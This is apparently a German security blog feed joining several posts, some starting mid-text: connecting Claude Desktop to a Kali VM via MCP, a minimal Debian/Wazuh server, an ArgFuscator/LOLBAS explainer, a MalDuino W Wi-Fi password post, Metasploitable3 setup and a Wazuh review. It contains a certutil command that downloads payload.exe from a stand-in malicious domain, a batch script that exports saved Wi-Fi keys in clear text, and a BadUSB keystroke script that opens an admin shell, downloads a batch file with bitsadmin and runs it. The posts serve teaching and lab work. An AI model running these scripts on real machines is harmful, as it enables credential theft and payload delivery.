Dieses Tutorial beschreibt die Vorgehensweise, um Claude Desktop auf einem Mac mit einer Kali Linux VM zu verbinden. Hierfür kommt das Model Context Protocol (MCP) zum Einsatz.

Das Besondere an diesem Setup: Das macOS-System bleibt frei von lokal installierten Hacking-Tools, da die gesamte Kommunikation sicher getunnelt über SSH erfolgt.

Der Versuchsaufbau (Lab Setup)

Für das Verständnis der Architektur ist ein Blick auf die Netzwerkkonfiguration hilfreich. Das Setup besteht aus zwei Maschinen im lokalen Netzwerk:

1. Der Controller (macOS): Hier wird die Claude Desktop App ausgeführt. IP: 192.168.171.37 (Beispieladresse).
2. Das Werkzeug (Kali Linux VM): Auf diesem System sind die Pentesting-Tools installiert. IP: 192.168.171.38(Beispieladresse, diese ist an das eigene Netzwerk anzupassen).

Funktionsweise des Kali-MCP-Servers

Eine häufige Hürde bei der Einrichtung ist das Verständnis der Komponenten auf der Kali-Seite. Es arbeiten zwei Elemente zusammen:

1. Das Backend (kali-server-mcp): Ein Flask-Webserver, der mit Root-Rechten (via sudo) ausgeführt wird. Er lauscht standardmäßig auf Port 5000 und führt die Befehle (wie z. B. nmap -O) aus.
2. Die Bridge (mcp_server.py): Ein Python-Skript, das als Übersetzer fungiert. Claude Desktop nutzt das „MCP“-Protokoll (ein JSON-Format über Standard-Input/Output), während der Webserver HTTP spricht. Die Bridge nimmt die Befehle von Claude entgegen und leitet sie an den lokalen Webserver weiter.

Der Vorteil: Die Bridge muss nicht manuell gestartet werden. Claude baut eine SSH-Verbindung zur Kali-VM auf und initiiert die Bridge automatisch.

Schritt-für-Schritt Anleitung

Voraussetzungen

• Mac mit installierter Claude Desktop App.
• Kali Linux VM
• Beide Geräte befinden sich im selben Netzwerk.

Schritt 1: Installation der Pakete auf Kali

Zunächst müssen die erforderlichen Pakete auf der Kali-VM installiert werden. In aktuellen Kali-Versionen sind diese direkt über den Paketmanager verfügbar.

Das Terminal auf der Kali-VM öffnen und folgende Befehle ausführen:

sudo apt update
sudo apt install -y mcp-kali-server

Hinweis: Dieses Paket installiert sowohl den Backend-Webserver (kali-server-mcp) als auch das notwendige Client-Skript (mcp_server.py).

Schritt 2: Starten des Backend-Servers auf Kali

Nach der Installation muss der Server gestartet werden. Dieser Prozess ist notwendig, damit die Bridge später eine Gegenstelle hat.

# Auf der Kali VM
sudo kali-server-mcp --port 5000

Das Terminal sollte geöffnet bleiben. Die Ausgabe sollte lauten: Running on http://127.0.0.1:5000.

Schritt 3: Einrichtung von Passwordless SSH

Damit Claude im Hintergrund agieren kann, muss der SSH-Login vom Mac zur Kali-VM ohne Passworteingabe möglich sein.

1. Generierung der SSH-Keys auf dem Mac (falls nicht vorhanden):ssh-keygen -t ed25519 # WICHTIG: Es darf kein Passwort (Passphrase) gesetzt werden (einfach Enter drücken).
2. Übertragung des Keys auf die Kali-VM: Der Platzhalter user ist durch den Kali-Benutzernamen und die IP durch die korrekte Kali-IP zu ersetzen.ssh-copy-id user@192.168.171.38
3. Funktionstest: ssh user@192.168.171.38 "echo Erfolg"
   Erfolgt keine Passwortabfrage, ist die Konfiguration korrekt.

Schritt 4: Konfiguration von Claude Desktop

Nun wird Claude angewiesen, bei Bedarf eine SSH-Verbindung aufzubauen und den Python-Client auf dem Zielsystem zu starten.

Die Konfigurationsdatei auf dem Mac ist zu öffnen: ~/Library/Application Support/Claude/claude_desktop_config.json

Folgender Inhalt ist einzufügen (Benutzer und IP sind anzupassen):

{
  "mcpServers": {
    "kali-remote": {
      "command": "ssh",
      "args": [
        "user@192.168.171.38",
        "python3",
        "/usr/share/mcp-kali-server/mcp_server.py", 
        "--server",
        "http://127.0.0.1:5000"
      ]
    }
  }
}

Schritt 5: Pentesting mit KI-Unterstützung

Nach einem Neustart von Claude Desktop sollten keine Fehlermeldungen erscheinen. Dann können Befehle in natürlicher Sprache eingegeben werden:

„Scanne das Netzwerk 192.168.171.0/24 nach aktiven Hosts.“ „Führe einen Nmap Version-Scan auf 192.168.171.1 durch und erkläre die offenen Ports.“

Claude führt die Befehle auf der VM aus, liest den Output und analysiert diesen direkt.

Fazit

Dieses Setup optimiert den Workflow erheblich. Die saubere Benutzeroberfläche von Claude auf dem Mac bleibt erhalten, während die volle Leistungsfähigkeit der Kali-Tools in einer isolierten VM genutzt wird. Durch den Einsatz des SSH-Tunnels müssen zudem keine unsicheren Webserver im Netzwerk exponiert werden.

Der Beitrag AI-Powered Pentesting: Verbindung von Claude Desktop mit einer Kali-Linux-VM erschien zuerst auf .

• Docker für alle produktiven Anwendungen
• Wazuh-Agent zur Host- und Containerüberwachung
• systemd + SSH

Alles andere wird konsequent weggelassen.
Firewall-Regeln werden über die nativen Docker-Netzwerke und den Reverse Proxy (Nginx Proxy Manager) gesteuert – kein ufw, kein iptables nötig.

Schritt 1 – Debian 13 Minimalinstallation

• ISO: Debian 13 netinst herunterladen
• Partitionierung (optional eigene Partition für /var/lib/docker)
• Software-Auswahl: nur SSH-Server aktivieren
• Alles andere deaktivieren: Desktop, Standardwerkzeuge, Mail, Druck, Snap etc.

Nach der Installation login als root.

Schritt 2 – System aktualisieren und Grundpakete installieren

apt update && apt upgrade -y
apt install -y ca-certificates curl gnupg wget lsb-release qemu-guest-agent sudo

Schritt 3 – Docker installieren

curl -fsSL https://get.docker.com | sh

Testen:

docker run hello-world

Optional: Einen Benutzer zur Docker-Gruppe hinzufügen, wenn du später nicht als Root arbeiten willst:

usermod -aG docker DEIN_BENUTZER

Schritt 4 – Wazuh-Agent installieren

Paket herunterladen. Achtung: Hier Version der Software und IP des Wazuh-Servers entsprechend anpassen.

cd /tmp
wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.1-1_amd64.deb && sudo WAZUH_MANAGER='192.168.171.13' WAZUH_AGENT_NAME='test' dpkg -i ./wazuh-agent_4.14.1-1_amd64.deb

Hier jetzt die Konfiguration prüfen. Manchmal wird die IP-Adresse des Wazuh-Servers nicht richtig gesetzt:

nano /var/ossec/etc/ossec.conf

Minimal:

<client>
  <server>
    <address>WAZUH_MANAGER_IP</address>
  </server>
</client>

Agent starten:

systemctl enable wazuh-agent
systemctl start wazuh-agent
systemctl status wazuh-agent

Schritt 5 – Nicht benötigte Dienste entfernen

systemctl disable --now avahi-daemon cups bluetooth ModemManager
apt purge exim4* cups* avahi-daemon bluetooth -y
apt autoremove --purge -y

Schritt 6 – Logs begrenzen

nano /etc/systemd/journald.conf

Eintragen:

SystemMaxUse=300M
RuntimeMaxUse=100M

Danach:

systemctl restart systemd-journald

Schritt 7 – Dienste-Zustand prüfen

systemctl --type=service --state=running

Erlaubte Dienste:

• ssh
• docker
• wazuh-agent
• systemd-journald
• cron
• network

Der Beitrag Debian Server light mit Docker und Wazuh-Agent (Debian 13 Minimal) erschien zuerst auf .

Weitere Informationen über meinen Beitrag zum Sonderheft findet man hier.

Der Beitrag Ausgabe der iX Special 2025 – Securitytools erschienen erschien zuerst auf .

Die Kunst der Befehlszeilen-Verschleierung

Die Befehlszeilenverschleierung ist eine ausgeklügelte Technik, die von Bedrohungsakteuren eingesetzt wird, um ihre Aktivitäten zu verbergen und der Erkennung zu entgehen. Dies wird durch verschiedene Manipulationen erreicht, zu denen die Änderung von Zeichenketten, die Verschleierung von Dateipfaden und die Integration von Unicode-Zeichen gehören, um die wahre Natur von Befehlen zu maskieren. Viele Advanced-Persistent-Threat-(APT)-Gruppen sind dafür bekannt, solche Verschleierungstechniken als Kernbestandteil ihrer Angriffsmethoden einzusetzen.

Was muss man wissen?

Bevor wir uns mit ArgFuscator beschäftigen, sollte der Begriff „Living off the Land” (zu Deutsch etwa „vom Land leben”) erläutert werden. Dabei handelt es sich um eine Angriffstechnik, bei der Cyberkriminelle ausschließlich legitime, bereits auf einem System vorhandene Werkzeuge und Programme für ihre bösartigen Zwecke missbrauchen. Anstatt eigene Malware auf das Zielsystem zu schleusen, die von Antivirenprogrammen leichter erkannt werden könnte, nutzen sie die Bordmittel des Betriebssystems (wie PowerShell, WMI oder certutil.exe unter Windows) oder andere bereits installierte Software.

Hier kommt das LOLBAS-Projekt (Living Off the Land Binaries and Scripts) ins Spiel. Bei diesem von der Sicherheits-Community betriebenen Open-Source-Projekt wird dokumentiert, wie diese bordeigenen Windows-Programme (Binaries, Scripts, Libraries) für böswillige Zwecke missbraucht werden können.

Die zentrale Anlaufstelle dieses Projekts ist die Website https://lolbas-project.github.io/. Sie listet Hunderte von Windows-Dateien auf und beschreibt detailliert, wie jede einzelne für Aktionen missbraucht werden kann, für die sie ursprünglich nicht gedacht war. Verteidiger (Blue Teams) nutzen diese Datenbank, um verdächtige Aktivitäten besser zu erkennen und zu verstehen, während Angreifer (Red Teams) sie nutzen, um neue Angriffspfade zu finden.

Wie ArgFuscator funktioniert

Das folgende Beispiel soll eine mögliche Gefahr verdeutlichen: Certutil.exe ist ein legitimes Kommandozeilenprogramm in Windows, das eigentlich zur Verwaltung von Zertifikaten dient. Ein Blick in die LOLBAS-Datenbank zeigt jedoch, wie es von Angreifern zweckentfremdet werden kann.

Ein Angreifer hat bereits einen ersten Zugang zu einem System erlangt und möchte nun weitere Schadsoftware (z.B. einen Trojaner namens payload.exe) nachladen. Viele Unternehmen blockieren den direkten Download von .exe-Dateien über den Browser oder Firewalls. PowerShell-Downloads werden oft ebenfalls streng überwacht. Certutil.exehingegen wird selten blockiert. Der Angreifer kann nun folgenden, in der LOLBAS-Datenbank dokumentierten Befehl verwenden:

certutil.exe -urlcache -split -f "http://boesartige-domain.com/payload.exe" C:\temp\virus.exe

Was bedeuten die Parameter?

• certutil.exe: Das legitime Windows-Tool wird aufgerufen.
• -urlcache -split -f: Diese Parameter weisen das Tool an, eine Datei von einer URL herunterzuladen und im Dateisystem zu speichern.
• "http://boesartige-domain.com/payload.exe": Dies ist die Adresse, unter der die Schadsoftware liegt.
• C:\temp\virus.exe: Dies ist der Speicherort und der neue Name der heruntergeladenen Datei auf dem Zielsystem.

Für ein Sicherheitssystem sieht diese Aktion zunächst wie eine legitime Zertifikatsoperation aus. Tatsächlich wurde aber das System kompromittiert, indem eine Datei heruntergeladen wurde, ohne dass klassische Alarmglocken schrillen. Die LOLBAS-Datenbank liefert dem Angreifer also die exakte Syntax und Idee für diesen heimlichen Download.

Um die Absicht des Angreifers weiter zu verschleiern, kommt ArgFuscator ins Spiel. Das Tool wandelt den standardmäßig leicht erkennbaren Befehl in eine stark obfuskierte Version um. Während der ursprüngliche Befehl sofortige Warnungen auslösen könnte, ist sein obfuskierter Gegenpart für Sicherheitslösungen erheblich schwieriger zu identifizieren.

Fazit

ArgFuscator erweist sich als wertvolle Ressource für folgende offensive und defensive Sicherheitsexperten.

• Red Teaming/Penetration Testing: Auf der offensiven Seite ermöglicht Argfuscator die Emulation von Angreifertechniken und vermittelt so ein tieferes Verständnis dafür, wie Bedrohungsakteure in realen Szenarien agieren.
• Defensive Sicherheit (Blue Teaming): Verteidiger können dieses Tool nutzen, um die Wirksamkeit ihrer Erkennungsmechanismen gegen Befehlszeilen, die verschiedenen Verschleierungstechniken unterzogen wurden, rigoros zu testen. So können sie Lücken in ihrer Sicherheitslage identifizieren und ihre Erkennungsregeln verfeinern.

Das folgende interessante Video von John Hammond, das die Zusammenhänge erklärt und ein praktisches Beispiel bringt, ist sehr zu empfehlen.

Der Beitrag Die Verschleierung enthüllen: Ein Einblick in ArgFuscator erschien zuerst auf .

Die Anleitung führt durch folgende Schritte:

• Vorbereitung des Raspberry Pi 4, meist mit einem aktuellen Raspberry Pi OS (ARM64).
• Installation der benötigten Softwarepakete und Hinzufügen des Wazuh-Repositorys.
• Installation und Konfiguration der Wazuh-Komponenten (z. B. Agent, Server, Dashboard) auf dem Raspberry Pi.
• Starten und Aktivieren der Wazuh-Dienste, damit sie beim Systemstart automatisch laufen.
• Abschließend Zugriff auf das Wazuh Dashboard zur Überwachung und Verwaltung der Sicherheitsereignisse.

Der Blogeintrag hebt hervor, dass die Installation zwar einige Schritte erfordert, aber mit der Anleitung auch für Einsteiger nachvollziehbar ist. Das Ergebnis ist eine kostengünstige, aber leistungsfähige Sicherheitslösung für kleine Netzwerke.

Der Beitrag Wazuh auf einem Raspberry Pi 4 installieren erschien zuerst auf .

Die gute Nachricht ist, dass es eine Möglichkeit gibt, dieses Passwort wiederherzustellen – und zwar mit einem Skript, das speziell für Penetrationstester und IT-Experten entwickelt wurde. Mit diesem Skript kann das vergessene WLAN-Passwort ausgelesen werden, ohne dass der Router selbst zurückgesetzt oder neu konfiguriert werden muss.

Das Problem: 

Windows 11 speichert WLAN-Passwörter in der Regel lokal im System, so dass sie nach der ersten Verbindung mit einem Netzwerk weiter verwendet werden können. Leider gibt es keine einfache, eingebaute Möglichkeit, diese Passwörter direkt anzuzeigen. Viele Benutzer geraten in Panik, wenn sie das Passwort vergessen haben und es keine Möglichkeit zu geben scheint, sich wieder mit dem Netzwerk zu verbinden.

Die Herausforderung für Penetration-Tester und IT-Experten ist es, diese Passwörter zu extrahieren, insbesondere wenn der physische Zugang zum Router nicht mehr möglich ist und der Nutzer keine anderen Sicherungskopien des Passworts besitzt.

Die Lösung 

Genau für dieses Problem habe ich ein Skript entwickelt, das unter Windows 11 verwendet werden kann, um WLAN-Passwörter auszulesen. Das folgende Skript kann direkt auf dem Windows-PC ausgeführt werden. Dazu benötigt man Administratorrechte:

@echo off
setlocal enabledelayedexpansion

REM Pfad zum Ordner, in dem die XML-Dateien gespeichert werden sollen
set "folderPath=%USERPROFILE%\WLANProfiles"

REM Erstellen des Ordners, falls er nicht existiert
if not exist "%folderPath%" mkdir "%folderPath%"

REM Exportieren der WLAN-Profile in den angegebenen Ordner
netsh wlan export profile folder="%folderPath%" key=clear

REM Durchsuchen Sie den angegebenen Ordner nach XML-Dateien
for %%f in ("%folderPath%\*.xml") do (
    REM Initialisieren einer Variable, um den keyMaterial-Wert zu speichern
    set "keyMaterial="

    REM Lesen der Datei zeilenweise
    for /f "tokens=*" %%l in ('type "%%f" ^| findstr /i "<keyMaterial>"') do (
        REM Extrahieren des Wertes zwischen den Tags
        set "line=%%l"
        set "line=!line:*<keyMaterial>=!"
        for /f "delims=<" %%t in ("!line!") do (
            set "keyMaterial=%%t"
        )
    )

    REM Anzeigen des extrahierten keyMaterial-Wertes
    if defined keyMaterial (
        echo keyMaterial in %%~nxf: !keyMaterial!
    )
)

endlocal
pause

Wer einen MalDuinow W zur Hand hat, kann auch eines der beiden Skripte verwenden, die auf Github abgelegt sind. Dabei wird die Batch-Datei direkt von Github heruntergeladen und auf dem PC ausgeführt. Dazu wird entweder die Kommandozeile oder die PowerShell verwendet. Hier die Version über die Kommandozeile:

REM ------------------------------------------------------------------------------------------------------
REM                                       Cmd Edition
REM  The script automates the process of downloading and executing a batch 
REM  file that retrieves Wi-Fi passwords stored on the system. It runs in the 
REM  currently logged-in Windows profile and displays the retrieved passwords 
REM  on the screen. The script uses keystrokes to run the necessary commands
REM  and visually indicates progress with LED color changes.
REM Pentestit.de - Frank Neugebauer (2025-03-25)
REM Currently supported layouts: DE, GB, US, ES, FR, DK, RU
REM Change language in the first line
REM -----------------------------------------------------------------------------------------------------
LOCALE DE
DEFAULTDELAY 2000
REM LED off
LED 0 0 0
REM LED red
LED 255 0 0
REM Run cmd as Administrator
GUI r
REM LED blue
LED 0 0 255
STRING cmd
CTRL SHIFT ENTER
TAB
TAB
TAB
ENTER
STRING bitsadmin /transfer mydownloadjob /download /priority high "https://raw.githubusercontent.com/eaglefn/malduinow/refs/heads/main/wifi_key_grabber.bat" %temp%\wifi.bat
ENTER
STRING cd %temp%
ENTER
STRING wifi.bat
ENTER
REM LED green
LED 0 255 0

Beide Skripte nutzen Windows-Tools, um gespeicherte WLAN-Passwörter aufzulisten und anzuzeigen.

Mit diesem Ansatz können Penetrationstester und IT-Profis schnell und sicher auf gespeicherte WLAN-Passwörter zugreifen – ohne dass der Router zurückgesetzt oder die Verbindung manuell wiederhergestellt werden muss.

Der Beitrag MalDuino W – WLAN Passwörter auslesen erschien zuerst auf .

Der Beitrag iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz erschien zuerst auf .

Es folgt ein zweiter Teil im nächsten Heft. Viele weitere interessante Artikel finden Sie im aktuellen Heft.

Der Beitrag iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source erschien zuerst auf .

Voraussetzungen

Bevor wir beginnen, stellen Sie sicher, dass Ihr System über folgende Software verfügt:

• Ubuntu-System mit Root-Zugriff
• Netzwerkzugriff auf den Proxmox-Server
• Vagrant und VirtualBox installiert

Schritt-für-Schritt-Anleitung

1. System vorbereiten

Zunächst einmal ist es wichtig, das System auf den neuesten Stand zu bringen und alle notwendigen Updates zu installieren:

sudo apt update && sudo apt upgrade -y

2. Vagrant und VirtualBox installieren

Für die Erstellung von Metasploitable3 verwenden wir Vagrant und VirtualBox:

sudo apt install vagrant virtualbox

3. Zusätzliche Pakete für Windows-Kompatibilität installieren

Damit Vagrant mit Windows-Gästen umgehen kann, müssen einige Ruby-Gems installiert werden:

sudo gem install winrm winrm-fs winrm-elevated

4. Arbeitsverzeichnis erstellen

Erstellen Sie als nächstes ein Arbeitsverzeichnis für Metasploitable3 und wechseln Sie in dieses Verzeichnis:

mkdir metasploitable3-workspace
cd metasploitable3-workspace

5. Vagrantfile herunterladen und die VMs starten

Das Vagrantfile wird verwendet, um die Konfiguration für Metasploitable3 herunterzuladen und zu starten:

curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile && vagrant up

6. Vagrant-Boxen hinzufügen

Die Vagrant-Boxen für Ubuntu und Windows werden heruntergeladen und hinzugefügt:

vagrant box add rapid7/metasploitable3-win2k8 --force
vagrant box add rapid7/metasploitable3-ub1404 --force

7. Verzeichnisse auf dem Proxmox-Server einrichten

Wechseln Sie nun zu Ihrem Proxmox-Server, um Verzeichnisse für die beiden VMs einzurichten:

cd /home
mkdir win2k8
mkdir ub1404

8. Dateien zum Proxmox-Server kopieren

Wechseln Sie in die entsprechenden Verzeichnisse auf Ihrem lokalen System, um die Dateien auf den Proxmox-Server zu kopieren. Beachten Sie, dass /home/<BENUTZERNAME> Ihr persönliches Benutzerverzeichnis ist, das auf Ihrem System möglicherweise anders heißt. Ebenso muss die IP-Adresse des Proxmox-Servers (<PROXMOX-SERVER-IP>) entsprechend Ihrer Netzwerkkonfiguration angepasst werden:

• Ubuntu-VM-Dateien kopieren

  cd /home/<BENUTZERNAME>/.vagrant.d/boxes/rapid7-VAGRANTSLASH-metasploitable3-ub1404/0.1.12-weekly/virtualbox
  scp * root@<PROXMOX-SERVER-IP>:/home/ub1404

• Windows-VM-Dateien kopieren

  cd /home/<BENUTZERNAME>/.vagrant.d/boxes/rapid7-VAGRANTSLASH-metasploitable3-win2k8/0.1.0-weekly/virtualbox
  scp * root@<PROXMOX-SERVER-IP>:/home/win2k8

9. Dateien auf dem Proxmox-Server konvertieren

Die kopierten Dateien müssen auf dem Proxmox-Server konvertiert werden, um die virtuellen Maschinen zu erstellen. Beachten Sie hierbei, dass die IDs der virtuellen Maschinen (<VM-ID-UBUNTU> und <VM-ID-WINDOWS>) entsprechend Ihrer Proxmox-Konfiguration angepasst werden müssen. In unserem Test haben wir die IDs 207 für Ubuntu und 208 für Windows verwendet. Passen Sie diese Werte an, je nachdem, welche IDs auf Ihrem System verfügbar sind:

• Ubuntu-VM konvertieren

  qm importovf <VM-ID-UBUNTU> box.ovf local-lvm
  qm importdisk <VM-ID-UBUNTU> metasploitable3-ub1404-disk001.vmdk local-lvm -format qcow2

• Windows-VM konvertieren

  qm importovf <VM-ID-WINDOWS> box.ovf local-lvm
  qm importdisk <VM-ID-WINDOWS> metasploitable3-win2k8-disk001.vmdk local-lvm -format qcow2

10. Login-Daten

Um sich auf den virtuellen Maschinen einzuloggen, verwenden Sie folgende Zugangsdaten:

• Benutzername: vagrant
• Passwort: vagrant

Fazit

Mit dieser Anleitung haben Sie die virtuellen Maschinen für Metasploitable3 erfolgreich eingerichtet. Diese Umgebung eignet sich perfekt für die Simulation von Angriffen, um Ihre Kenntnisse im Bereich der Cybersicherheit zu erweitern.

Denken Sie daran, die Hardwarekonfiguration der angelegten virtuellen Maschinen anzupassen, um eine optimale Performance zu gewährleisten:

• Ubuntu-VM: Passen Sie die Anzahl der zugewiesenen CPUs und die Menge des verfügbaren Arbeitsspeichers an, um sicherzustellen, dass die VM flüssig läuft. Je nach Systemressourcen empfiehlt es sich, mindestens 2 CPUs und 2 GB RAM zuzuweisen. Wählen Sie als OS-Typ Linux 6.x – 2.6 Kernel aus und passen ggf. die Boot-Reihenfolge an.
• Windows-VM: Da Windows im Allgemeinen mehr Ressourcen benötigt, sollten Sie die Anzahl der CPUs auf mindestens 2-4 und den Arbeitsspeicher auf mindestens 4 GB erhöhen, um eine akzeptable Leistung zu erzielen. Wählen Sie als OS-Typ MS-Windows7/2008r2 aus und passen ggf. die Boot-Reihenfolge an.

Unsere Hardwareeinstellungen der VM finden Sie in den folgenden Screenshots:

WIndows-VM:

Ubuntu-VM:

Vergessen Sie nicht, den Qemu-Guest-Agenten in den virtuellen Umgebungen zu installieren.

Der Beitrag Metasploitable3-VMs für Ubuntu und Windows in Proxmox einrichten erschien zuerst auf .

Dennoch gibt es einige Nachteile bei der Nutzung von Wazuh. Die Implementierung und Konfiguration der Plattform ist komplex und erfordert technisches Know-how. Die Benutzeroberfläche ist nicht immer intuitiv, was zu einer steilen Lernkurve führen kann. Darüber hinaus kann die ressourcenintensive Verarbeitung großer Datenmengen die Systemleistung beeinträchtigen, was gerade in großen Umgebungen zu einem Problem werden kann. Ein weiterer Aspekt ist der fehlende professionelle Support: Im Gegensatz zu kommerziellen Lösungen müssen sich Nutzer bei Problemen auf die Community verlassen. Auch die regelmäßige Feinabstimmung der Regeln zur Vermeidung von Fehlalarmen ist erforderlich, um die Effektivität der Plattform zu gewährleisten. Zudem kann die Skalierbarkeit von Wazuh in sehr großen Umgebungen an ihre Grenzen stoßen, was eine kontinuierliche Wartung und Optimierung der Systemleistung notwendig macht.

Insgesamt bietet Wazuh eine umfassende Lösung für die Sicherheitsüberwachung, die jedoch sorgfältige Planung und konstante Betreuung erfordert, um ihre vollen Potenziale auszuschöpfen und gleichzeitig die genannten Herausforderungen zu meistern.

Nachfolgend einige Screenshot der leistungsstarken Open-Source-Plattform:

Wazuh Übersichts-Dashboard

Schwachstellenerkennung

Threat Hunting

MITRE ATTACK Framework

Der Beitrag Open-Source-Plattform Wazuh erschien zuerst auf .